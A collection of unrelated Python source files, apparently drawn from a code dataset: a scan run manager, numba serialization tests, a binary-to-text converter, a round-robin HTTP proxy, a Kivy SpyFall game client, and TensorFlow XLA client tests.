except IndexError:
continue
if line[-1] != '\n':
line = line + '\n'
run_numbers[run_number] = line
return run_numbers
def _write_run_number(self, run_number=None):
self._run_start_time = datetime.datetime.now()
run_numbers = self._get_run_numbers()
if run_number:
self._run_number = run_number
else:
if not run_numbers:
self._run_number = 1
else:
self._run_number = max(dict.iterkeys(run_numbers)) + 1
run_numbers[self.run_number] = str(self.run_number) + ' ' + self.__class__.__name__ + ' ' + 'RUNNING' + ' ' + str(self._run_start_time) + '\n'
with self.file_lock:
with open(os.path.join(self.working_dir, "run" + ".cfg"), "w") as f:
for value in dict.itervalues(run_numbers):
f.write(value)
def _write_run_status(self, status_msg):
self._run_stop_time = datetime.datetime.now()
self._total_run_time = self._run_stop_time - self._run_start_time
run_numbers = self._get_run_numbers()
if not run_numbers:
run_numbers[self.run_number] = str(self.run_number) + ' ' + self.__class__.__name__ + ' ' + status_msg + ' ' + str(self._run_stop_time) + ' ' + str(self._total_run_time) + '\n'
else:
parts = re.split('\s+', run_numbers[self.run_number])
parts[2] = status_msg
run_numbers[self.run_number] = ' '.join(parts[:-1]) + ' ' + str(self._run_stop_time) + ' ' + str(self._total_run_time) + '\n'
with self.file_lock:
with open(os.path.join(self.working_dir, "run" + ".cfg"), "w") as f:
for value in dict.itervalues(run_numbers):
f.write(value)
def _signal_handler(self, signum, frame):
signal.signal(signal.SIGINT, signal.SIG_DFL) # setting default handler... pressing Ctrl-C a second time will kill application
self.handle_cancel(msg='Pressed Ctrl-C')
def thunkify(thread_name=None, daemon=True, default_func=None):
'''Make a function immediately return a function of no args which, when called,
waits for the result, which will start being processed in another thread.
Taken from https://wiki.python.org/moin/PythonDecoratorLibrary.
'''
def actual_decorator(f):
@functools.wraps(f)
def thunked(*args, **kwargs):
result = [None]
exc = [False, None] # has exception?, exception info
# wait_event = threading.Event()
def worker_func():
try:
func_result = f(*args, **kwargs)
result[0] = func_result
except Exception:
exc[0] = True
exc[1] = sys.exc_info()
logging.error("%s has thrown an exception:\n%s", thread_name, traceback.format_exc())
# finally:
# wait_event.set()
worker_thread = Thread(target=worker_func, name=thread_name if thread_name else None)
worker_thread.daemon = daemon
def thunk(timeout=None):
# avoid blocking MainThread
start_time = time()
while True:
worker_thread.join(timeout=0.1)
if (timeout and timeout < time() - start_time) or not worker_thread.is_alive():
break
# worker_thread.join(timeout=timeout)
# wait_event.wait()
if worker_thread.is_alive():
if default_func is None:
return
else:
return default_func()
if exc[0]:
raise exc[1][0], exc[1][1], exc[1][2]
return result[0]
worker_thread.start()
# threading.Thread(target=worker_func, name=thread_name if thread_name else None).start()
return thunk
return thunked
return actual_decorator
class RunManager(object):
def __init__(self, conf):
'''Run Manager is taking care of initialization and execution of runs.
Parameters
----------
conf : str, dict, file
Configuration for the run(s). Configuration will be passed to all scans.
'''
# fixing event handler: http://stackoverflow.com/questions/15457786/ctrl-c-crashes-python-after-importing-scipy-stats
if os.name == 'nt':
import thread
def handler(signum, hook=thread.interrupt_main):
hook()
return True
import win32api
win32api.SetConsoleCtrlHandler(handler, 1)
self._conf = None # configuration dictionary
self.current_run = None # current run number
self._conf_path = None # absolute path of the configuation file
self.init(conf)
@property
def conf(self):
'''Configuration (namedtuple)
'''
conf = namedtuple('conf', field_names=self._conf.keys())
return conf(**self._conf) # prevent changing dict
def init(self, conf):
# current working directory
if isinstance(conf, basestring) and os.path.isfile(os.path.abspath(conf)):
conf = os.path.abspath(conf)
self._conf_path = conf
# search directory upwards form current working directory
elif isinstance(conf, basestring) and find_file_dir_up(conf):
conf = find_file_dir_up(conf)
self._conf_path = conf
elif isinstance(conf, file):
self._conf_path = os.path.abspath(conf.name)
else:
self._conf_path = None
self._conf = self.open_conf(conf)
if 'working_dir' in self._conf and self._conf['working_dir']:
# dirty fix for Windows pathes
self._conf['working_dir'] = os.path.normpath(self._conf['working_dir'].replace('\\', '/'))
if self._conf_path and not os.path.isabs(self._conf['working_dir']):
# if working_dir is relative path, join path to configuration file and working_dir
self._conf['working_dir'] = os.path.join(os.path.dirname(self._conf_path), self._conf['working_dir'])
else:
# working_dir is absolute path, keep that
pass
# use path of configuration file
elif self._conf_path:
self._conf['working_dir'] = os.path.dirname(self._conf_path)
else:
raise ValueError('Cannot deduce working directory from configuration')
logging.info('Using working directory %s', self._conf['working_dir'])
def close(self):
if self.current_run is not None:
self.current_run.close()
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
@staticmethod
def open_conf(conf):
conf_dict = {}
if not conf:
pass
elif isinstance(conf, basestring): # parse the first YAML document in a stream
if os.path.isfile(os.path.abspath(conf)):
logging.info('Loading configuration from file %s', os.path.abspath(conf))
with open(os.path.abspath(conf), 'r') as f:
conf_dict.update(safe_load(f))
else: # YAML string
try:
conf_dict.update(safe_load(conf))
except ValueError: # invalid path/filename
raise IOError("File not found: %s" % os.path.abspath(conf))
else:
logging.info('Loading configuration from file %s', os.path.abspath(conf.name))
elif isinstance(conf, file): # parse the first YAML document in a stream
conf_dict.update(safe_load(conf))
else: # conf is already a dict
conf_dict.update(conf)
return conf_dict
def cancel_current_run(self, msg=None):
'''Control for runs.
'''
self.current_run.handle_cancel(msg=msg)
def run_run(self, run, conf=None, run_conf=None, use_thread=False, catch_exception=True):
'''Runs a run in another thread. Non-blocking.
Parameters
----------
run : class, object
Run class or object.
run_conf : str, dict, file
Specific configuration for the run.
use_thread : bool
If True, run run in thread and returns blocking function.
Returns
-------
If use_thread is True, returns function, which blocks until thread terminates, and which itself returns run status.
If use_thread is False, returns run status.
'''
if isinstance(conf, basestring) and os.path.isfile(conf):
logging.info('Updating configuration from file %s', os.path.abspath(conf))
elif conf is not None:
logging.info('Updating configuration')
conf = self.open_conf(conf)
self._conf.update(conf)
if isclass(run):
# instantiate the class
run = run(conf=self._conf)
local_run_conf = {}
# general parameters from conf
if 'run_conf' in self._conf:
logging.info('Updating run configuration using run_conf key from configuration')
local_run_conf.update(self._conf['run_conf'])
# check for class name, scan specific parameters from conf
if run.__class__.__name__ in self._conf:
logging.info('Updating run configuration using %s key from configuration' % (run.__class__.__name__,))
local_run_conf.update(self._conf[run.__class__.__name__])
if isinstance(run_conf, basestring) and os.path.isfile(run_conf):
logging.info('Updating run configuration from file %s', os.path.abspath(run_conf))
elif run_conf is not None:
logging.info('Updating run configuration')
run_conf = self.open_conf(run_conf)
# check for class name, scan specific parameters from conf
if run.__class__.__name__ in run_conf:
run_conf = run_conf[run.__class__.__name__]
# run_conf parameter has highest priority, updated last
local_run_conf.update(run_conf)
if use_thread:
self.current_run = run
@thunkify(thread_name='RunThread', daemon=True, default_func=self.current_run.get_run_status)
def run_run_in_thread():
return run.run(run_conf=local_run_conf)
signal.signal(signal.SIGINT, self._signal_handler)
logging.info('Press Ctrl-C to stop run')
return run_run_in_thread()
else:
self.current_run = run
status = run.run(run_conf=local_run_conf)
if not catch_exception and status != run_status.finished:
raise RuntimeError('Exception occurred. Please read the log.')
return status
def run_primlist(self, primlist, skip_remaining=False):
'''Runs runs from a primlist.
Parameters
----------
primlist : string
Filename of primlist.
skip_remaining : bool
If True, skip remaining runs, if a run does not exit with status FINISHED.
Note
----
Primlist is a text file of the following format (comment line by adding '#'):
<module name (containing class) or class (in either case use dot notation)>; <scan parameter>=<value>; <another scan parameter>=<another value>
'''
runlist = self.open_primlist(primlist)
for index, run in enumerate(runlist):
logging.info('Progressing with run %i out of %i...', index + 1, len(runlist))
join = self.run_run(run, use_thread=True)
status = join()
if skip_remaining and not status == run_status.finished:
logging.error('Exited run %i with status %s: Skipping all remaining runs.', run.run_number, status)
break
def open_primlist(self, primlist):
def isrun(item, module):
return isinstance(item, RunBase.__metaclass__) and item.__module__ == module # only class from module, not from other imports
if isinstance(primlist, basestring):
with open(primlist, 'r') as f:
f.seek(0)
run_list = []
for line in f.readlines():
line = line.partition('#')[0].strip()
if not line:
continue
parts = re.split('\s*[;]\s*', line)
try:
mod = import_module(parts[0]) # points to module
except ImportError:
mod = import_module(parts[0].rsplit('.', 1)[0]) # points to class
islocalrun = partial(isrun, module=parts[0].split('.')[-2])
clsmembers = getmembers(mod, islocalrun)
run_cls = None
for cls in clsmembers:
if cls[0] == parts[0].rsplit('.', 1)[1]:
run_cls = cls[1]
break
if not run_cls:
raise ValueError('Found no matching class: %s' % parts[0].rsplit('.', 1)[1])
else:
islocalrun = partial(isrun, module=parts[0])
clsmembers = getmembers(mod, islocalrun)
if len(clsmembers) > 1:
raise ValueError('Found more than one matching class.')
elif not len(clsmembers):
raise ValueError('Found no matching class.')
run_cls = clsmembers[0][1]
if run_cls.__class__.__name__ in self._conf:
run_conf = self._conf[run_cls.__class__.__name__]
else:
run_conf = {}
for param in parts[1:]:
key, value = re.split('\s*[=:]\s*', param, 1)
run_conf[key] = literal_eval(value)
run_list.append(run_cls(conf=self._conf, run_conf=run_conf))
return run_list
else:
AttributeError('Primlist format not supported.')
def _signal_handler(self, signum, frame):
signal.signal(signal.SIGINT, signal.SIG_DFL) # setting default handler... pressing Ctrl-C a second time will kill application
self.cancel_current_run(msg='Pressed Ctrl-C')
def set_event_when_keyboard_interrupt(_lambda):
'''Decorator function that sets Threading.Event() when keyboard interrupt (Ctrl+C) was raised
Parameters
----------
_lambda : function
Lambda function that points to Threading.Event() object
Returns
-------
wrapper : function
Examples
--------
@set_event_when_keyboard_interrupt(lambda x: x.stop_thread_event)
def scan(self, **kwargs):
# some code
Note
----
Decorated functions cannot be derived.
'''
def wrapper(f):
@wraps(f)
def wrapped_f(self, *f_args, **f_kwargs):
try:
f(self, *f_args, **f_kwargs)
except KeyboardInterrupt:
_lambda(self).set()
# logging.info('Keyboard interrupt: setting %s' % _lambda(self).__name__)
return wrapped_f
return wrapper
if __name__ == "__main__":
pass
|
test_serialize.py | import contextlib
import gc
import pickle
import runpy
import subprocess
import sys
import unittest
from multiprocessing import get_context
import numba
from numba.core.errors import TypingError
from numba.tests.support import TestCase
from numba.core.target_extension import resolve_dispatcher_from_str
from numba.cloudpickle import dumps, loads
from .serialize_usecases import *
class TestDispatcherPickling(TestCase):
def run_with_protocols(self, meth, *args, **kwargs):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
meth(proto, *args, **kwargs)
@contextlib.contextmanager
def simulate_fresh_target(self):
hwstr = 'cpu'
dispatcher_cls = resolve_dispatcher_from_str(hwstr)
old_descr = dispatcher_cls.targetdescr
# Simulate fresh targetdescr
dispatcher_cls.targetdescr = type(dispatcher_cls.targetdescr)(hwstr)
try:
yield
finally:
# Be sure to reinstantiate old descriptor, otherwise other
# objects may be out of sync.
dispatcher_cls.targetdescr = old_descr
def check_call(self, proto, func, expected_result, args):
def check_result(func):
if (isinstance(expected_result, type)
and issubclass(expected_result, Exception)):
self.assertRaises(expected_result, func, *args)
else:
self.assertPreciseEqual(func(*args), expected_result)
# Control
check_result(func)
pickled = pickle.dumps(func, proto)
with self.simulate_fresh_target():
new_func = pickle.loads(pickled)
check_result(new_func)
def test_call_with_sig(self):
self.run_with_protocols(self.check_call, add_with_sig, 5, (1, 4))
# Compilation has been disabled => float inputs will be coerced to int
self.run_with_protocols(self.check_call, add_with_sig, 5, (1.2, 4.2))
def test_call_without_sig(self):
self.run_with_protocols(self.check_call, add_without_sig, 5, (1, 4))
self.run_with_protocols(self.check_call, add_without_sig, 5.5, (1.2, 4.3))
# Object mode is enabled
self.run_with_protocols(self.check_call, add_without_sig, "abc", ("a", "bc"))
def test_call_nopython(self):
self.run_with_protocols(self.check_call, add_nopython, 5.5, (1.2, 4.3))
# Object mode is disabled
self.run_with_protocols(self.check_call, add_nopython, TypingError, (object(), object()))
def test_call_nopython_fail(self):
# Compilation fails
self.run_with_protocols(self.check_call, add_nopython_fail, TypingError, (1, 2))
def test_call_objmode_with_global(self):
self.run_with_protocols(self.check_call, get_global_objmode, 7.5, (2.5,))
def test_call_closure(self):
inner = closure(1)
self.run_with_protocols(self.check_call, inner, 6, (2, 3))
def check_call_closure_with_globals(self, **jit_args):
inner = closure_with_globals(3.0, **jit_args)
self.run_with_protocols(self.check_call, inner, 7.0, (4.0,))
def test_call_closure_with_globals_nopython(self):
self.check_call_closure_with_globals(nopython=True)
def test_call_closure_with_globals_objmode(self):
self.check_call_closure_with_globals(forceobj=True)
def test_call_closure_calling_other_function(self):
inner = closure_calling_other_function(3.0)
self.run_with_protocols(self.check_call, inner, 11.0, (4.0, 6.0))
def test_call_closure_calling_other_closure(self):
inner = closure_calling_other_closure(3.0)
self.run_with_protocols(self.check_call, inner, 8.0, (4.0,))
def test_call_dyn_func(self):
# Check serializing a dynamically-created function
self.run_with_protocols(self.check_call, dyn_func, 36, (6,))
def test_call_dyn_func_objmode(self):
# Same with an object mode function
self.run_with_protocols(self.check_call, dyn_func_objmode, 36, (6,))
def test_renamed_module(self):
# Issue #1559: using a renamed module (e.g. `import numpy as np`)
# should not fail serializing
expected = get_renamed_module(0.0)
self.run_with_protocols(self.check_call, get_renamed_module,
expected, (0.0,))
def test_call_generated(self):
self.run_with_protocols(self.check_call, generated_add,
46, (1, 2))
self.run_with_protocols(self.check_call, generated_add,
1j + 7, (1j, 2))
def test_other_process(self):
"""
Check that reconstructing doesn't depend on resources already
instantiated in the original process.
"""
func = closure_calling_other_closure(3.0)
pickled = pickle.dumps(func)
code = """if 1:
import pickle
data = {pickled!r}
func = pickle.loads(data)
res = func(4.0)
assert res == 8.0, res
""".format(**locals())
subprocess.check_call([sys.executable, "-c", code])
def test_reuse(self):
"""
Check that deserializing the same function multiple times re-uses
the same dispatcher object.
Note that "same function" is intentionally under-specified.
"""
func = closure(5)
pickled = pickle.dumps(func)
func2 = closure(6)
pickled2 = pickle.dumps(func2)
f = pickle.loads(pickled)
g = pickle.loads(pickled)
h = pickle.loads(pickled2)
self.assertIs(f, g)
self.assertEqual(f(2, 3), 10)
g.disable_compile()
self.assertEqual(g(2, 4), 11)
self.assertIsNot(f, h)
self.assertEqual(h(2, 3), 11)
# Now make sure the original object doesn't exist when deserializing
func = closure(7)
func(42, 43)
pickled = pickle.dumps(func)
del func
gc.collect()
f = pickle.loads(pickled)
g = pickle.loads(pickled)
self.assertIs(f, g)
self.assertEqual(f(2, 3), 12)
g.disable_compile()
self.assertEqual(g(2, 4), 13)
def test_imp_deprecation(self):
"""
The imp module was deprecated in v3.4 in favour of importlib
"""
code = """if 1:
import pickle
import warnings
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', DeprecationWarning)
from numba import njit
@njit
def foo(x):
return x + 1
foo(1)
serialized_foo = pickle.dumps(foo)
for x in w:
if 'serialize.py' in x.filename:
assert "the imp module is deprecated" not in x.msg
"""
subprocess.check_call([sys.executable, "-c", code])
class TestSerializationMisc(TestCase):
def test_numba_unpickle(self):
# Test that _numba_unpickle is memorizing its output
from numba.core.serialize import _numba_unpickle
random_obj = object()
bytebuf = pickle.dumps(random_obj)
hashed = hash(random_obj)
got1 = _numba_unpickle(id(random_obj), bytebuf, hashed)
# not the original object
self.assertIsNot(got1, random_obj)
got2 = _numba_unpickle(id(random_obj), bytebuf, hashed)
# unpickled results are the same objects
self.assertIs(got1, got2)
class TestCloudPickleIssues(TestCase):
"""This test case includes issues specific to the cloudpickle implementation.
"""
_numba_parallel_test_ = False
def test_dynamic_class_reset_on_unpickle(self):
# a dynamic class
class Klass:
classvar = None
def mutator():
Klass.classvar = 100
def check():
self.assertEqual(Klass.classvar, 100)
saved = dumps(Klass)
mutator()
check()
loads(saved)
# Without the patch, each `loads(saved)` will reset `Klass.classvar`
check()
loads(saved)
check()
@unittest.skipIf(__name__ == "__main__",
"Test cannot run as when module is __main__")
def test_main_class_reset_on_unpickle(self):
mp = get_context('spawn')
proc = mp.Process(target=check_main_class_reset_on_unpickle)
proc.start()
proc.join(timeout=60)
self.assertEqual(proc.exitcode, 0)
def test_dynamic_class_reset_on_unpickle_new_proc(self):
# a dynamic class
class Klass:
classvar = None
# serialize Klass in this process
saved = dumps(Klass)
# Check the reset problem in a new process
mp = get_context('spawn')
proc = mp.Process(target=check_unpickle_dyn_class_new_proc, args=(saved,))
proc.start()
proc.join(timeout=60)
self.assertEqual(proc.exitcode, 0)
def test_dynamic_class_issue_7356(self):
cfunc = numba.njit(issue_7356)
self.assertEqual(cfunc(), (100, 100))
class DynClass(object):
# For testing issue #7356
a = None
def issue_7356():
with numba.objmode(before="intp"):
DynClass.a = 100
before = DynClass.a
with numba.objmode(after="intp"):
after = DynClass.a
return before, after
def check_main_class_reset_on_unpickle():
# Load module and get its global dictionary
glbs = runpy.run_module(
"numba.tests.cloudpickle_main_class",
run_name="__main__",
)
# Get the Klass and check it is from __main__
Klass = glbs['Klass']
assert Klass.__module__ == "__main__"
assert Klass.classvar != 100
saved = dumps(Klass)
# mutate
Klass.classvar = 100
# check
_check_dyn_class(Klass, saved)
def check_unpickle_dyn_class_new_proc(saved):
Klass = loads(saved)
assert Klass.classvar != 100
# mutate
Klass.classvar = 100
# check
_check_dyn_class(Klass, saved)
def _check_dyn_class(Klass, saved):
def check():
if Klass.classvar != 100:
raise AssertionError("Check failed. Klass reset.")
check()
loaded = loads(saved)
if loaded is not Klass:
raise AssertionError("Expected reuse")
# Without the patch, each `loads(saved)` will reset `Klass.classvar`
check()
loaded = loads(saved)
if loaded is not Klass:
raise AssertionError("Expected reuse")
check()
if __name__ == '__main__':
unittest.main()
|
bintotxt.py | import os
import numpy as np
import sys
from multiprocessing import Process
import time
import subprocess
def bin2float(file,dtype):
if file.endswith(".bin"):
if dtype == "fp32":
data = np.fromfile(file,dtype='float32')
elif dtype == "fp16":
data = np.fromfile(file,dtype='float16')
elif dtype == "int32":
data = np.fromfile(file,dtype=np.int32)
elif dtype == "int8":
data = np.fromfile(file,dtype=np.int8)
else:
print("Input dtype error!")
return 0
float_file=file+".txt"
print("save the file: "+float_file)
np.savetxt(float_file,data.reshape(-1,1),fmt='%.6f')
def bintofloat(filename,dtype):
if os.path.isdir(filename):
process= []
i=0
for file in os.listdir(filename):
if(file != "." and file !=".."):
process.append(Process(target=bin2float, args=(filename+file,dtype,)))
process[i].start()
i +=1
else:
bin2float(filename,dtype)
if __name__ == "__main__":
subprocess.run("ulimit -n 65535",shell=True,cwd="./")
print("params: " + sys.argv[1] + "," + sys.argv[2])
bintofloat(sys.argv[1],sys.argv[2])
|
childserver.py | import socket
from http.server import *
import sys
import urllib
import threading
import time
routingsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
routingsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);
routingsocket.bind(('', 1080))
routingsocket.listen(1000000000)
number_of_servers = 3
counter = 0
page = " "
method = 1 #default round robin
weights = [2, 4, 5]
temp_weight = weights[0]
parent_servers = [("192.168.43.119", 8081), ('192.168.43.119', 8082), ('192.168.43.119', 8080)]
print "Tag --clear-log to clear the log file"
print "Add method tag: e.g. --method=1"
print "1. Round robin"
print "2. Weighted round robin"
if len(sys.argv) >= 2 and "--clear-log" in sys.argv[1]:
fp = open("requests.log", "w")
fp.close()
if len(sys.argv) >= 2 and ("--method" in sys.argv[1]):
type_m = sys.argv[1]
method = int(type_m.split("=")[1])
elif len(sys.argv) >= 3 and ("--method" in sys.argv[2]):
type_m = sys.argv[2]
method = int(type_m.split("=")[1])
assert(method <= 2)
def process_request(client_socket, client_address):
global counter
global temp_weight
global weights
request = client_socket.recv(1000000000)
print("Request received from client")
print request
timestamp = time.strftime("%d %b %Y %H:%M:%S ", time.localtime())
fp = open("requests.log", "a+")
fp.write(timestamp +" "+ str(client_address[0]) +" "+ request.split("\n")[0] + "\n")
fp.close()
parentsocket = socket.socket()
parentsocket.connect(parent_servers[counter])
if method == 1:
counter = (counter + 1)%number_of_servers
elif method == 2:
temp_weight -= 1
if temp_weight == 0:
counter = (counter + 1)%number_of_servers
temp_weight = weights[counter]
parentsocket.send(request)
print "Receiving from parent"
while True:
page = parentsocket.recv(1000000000)
client_socket.send(page)
if not page:
break
print "File received"
print page
client_socket.close()
parentsocket.close()
while True:
client_socket, client_address = routingsocket.accept()
request_thread = threading.Thread(target = process_request, args = (client_socket, client_address))
request_thread.start()
request_thread.join()
routingsocket.close()
|
main.py | from kivy.config import Config
MAX_SIZE = (500, 1050)
Config.set('graphics', 'width', MAX_SIZE[0])
Config.set('graphics', 'height', MAX_SIZE[1])
from kivy.core.window import Window
import kivy
import Global
import client
import time
import threading
import time
from kivy import *
from kivy.app import App
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivymd.theming import ThemeManager
from kivy.uix.button import Button
from kivymd.app import MDApp
from kivy.core.audio import SoundLoader
from kivy.uix.widget import Widget
Global.background_music.play()
sm = ScreenManager()
Playground_Screen = kivy.properties.ObjectProperty(None)
class MainScreen(Screen):
def on_enter(self):
if(Global.isFirstGame == 'true'):
sm.remove_widget(sm.get_screen('playground'))
Global.isFirstGame = 'false'
def isAdmin_change(self, flag):
Global.isAdmin = flag
def push_button_sound(self):
Global.button_sound.play()
class OptionsScreen(Screen):
def push_button_sound(self):
Global.button_sound.play()
def change_music_volume(self, value):
Global.background_music.volume = value/10
def change_sound_of_push_volume(self, value):
Global.button_sound.volume = value/10
class CreateLobbyScreen(Screen):
playground_screen = 0
label_spyamount = kivy.properties.ObjectProperty(None)
def push_button_sound(self):
Global.button_sound.play()
def appear_token(self):
Global.data = client.createLobby(Global.players_amount, Global.spy_amount)
Global.token = Global.data[0]
self.token_layout.token_button.font_size = 60
self.token_layout.token_button.texture_update()
self.token_layout.token_button.text = Global.token
self.play_button_layout.play_button.disabled = False
Playground_Screen = PlaygroundScreen(name = 'playground')
sm.add_widget(Playground_Screen)
def add_spy(self):
if(Global.spy_amount == 4):
Global.spy_amount = 0
Global.spy_amount += 1
self.ids.lbl_spy.text = str(Global.spy_amount)
print(Global.spy_amount)
def delete_spy(self):
if(Global.spy_amount == 0):
Global.spy_amount = 1
Global.spy_amount -= 1
self.ids.lbl_spy.text = str(Global.spy_amount)
print(Global.spy_amount)
def my_value(self, value):
Global.players_amount = value
class ConnectScreen(Screen):
token_code = kivy.properties.StringProperty('')
def push_button_sound(self):
Global.button_sound.play()
def enter_game(self, tokdef = ''):
self.token_code = tokdef
if(self.token_code != ''):
Global.data = client.connect(self.get_token())
Global.token = self.get_token()
if(Global.data == 'invalid token'):
layout = GridLayout(cols = 1, padding = 15, spacing = 15)
label__text = Label(text = 'Invalid Token.\nTry Again')
layout.add_widget(label__text)
popup = Popup(title ='Error',
content = layout,
size_hint =(None, None), size =(200, 100))
popup.open()
else:
Playground_Screen = PlaygroundScreen(name = 'playground')
sm.add_widget(Playground_Screen)
sm.current = 'playground'
def get_token(self):
return self.token_code.upper()
pass
class PlaygroundScreen(Screen):
locations = []
role = ''
key_location = ''
scrn = ''
def push_button_sound(self):
Global.button_sound.play()
def enter_screen(self):
if(Global.isAdmin == False):
self.role = Global.data[0]
self.key_location = Global.data[1]
self.locations = Global.data[2]
else:
self.role = Global.data[1]
self.key_location = Global.data[2]
self.locations = Global.data[3]
for i in range(16):
my_button = Button(text=self.locations[i], on_press=self.location_press, background_normal = 'Playground Menu/empty_location_logo.png', background_down = 'Playground Menu/empty_location_logo.png')
self.grid.add_widget(my_button)
print(self.key_location)
def game_process(self):
gameCheck_status = threading.Thread(target=self.gameOver_update, daemon=True)
gameCheck_status.start()
def gameOver_update(self):
while(Global.gameOver == 'true'):
Global.gameOver = client.checkGameStatus(Global.token)
time.sleep(1)
Global.gameOver = 'true'
self.gameOver_popup()
def location_press(self, instance):
if(self.role == 'spy'):
client.checkLocation(Global.token, instance.text)
def gameOver_popup(self):
layout = GridLayout(cols = 1, padding = 10)
label_gameOver = Label(text = 'Game Over')
layout.add_widget(label_gameOver)
popup = Popup(title ='Congratz',
content = layout,
size_hint =(None, None), size =(250, 200))
popup.bind(on_dismiss=self.goto_Main)
popup.open()
def goto_Main(self, instance):
Global.isFirstGame = 'true'
sm.current = 'main'
def rolePopup(self):
layout = GridLayout(cols = 2, padding = 10)
label__role_text = Label(text = 'Role: ')
label_role = Label(text = self.role.upper())
label__location_text = Label(text = 'Location: ')
label__location = Label(text = self.key_location.upper())
layout.add_widget(label__role_text)
layout.add_widget(label_role)
if(self.role == 'peaceful'):
layout.add_widget(label__location_text)
layout.add_widget(label__location)
popup = Popup(title ='Role',
content = layout,
size_hint =(None, None), size =(350, 300))
popup.open()
self.game_process()
class SpyFallApp(MDApp):
def __init__(self, **kwargs):
self.title = 'SpyFall'
self.theme_cls.theme_style = 'Dark'
self.theme_cls.primary_palette = 'BlueGray'
super().__init__(**kwargs)
def build(self):
sm.add_widget(MainScreen(name='main'))
sm.add_widget(OptionsScreen(name='options'))
sm.add_widget(CreateLobbyScreen(name='createlobby'))
sm.add_widget(ConnectScreen(name='connect'))
return sm
if __name__ == '__main__':
SpyFallApp().run()
|
xla_client_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend, cloud_tpu=False, tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_]
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
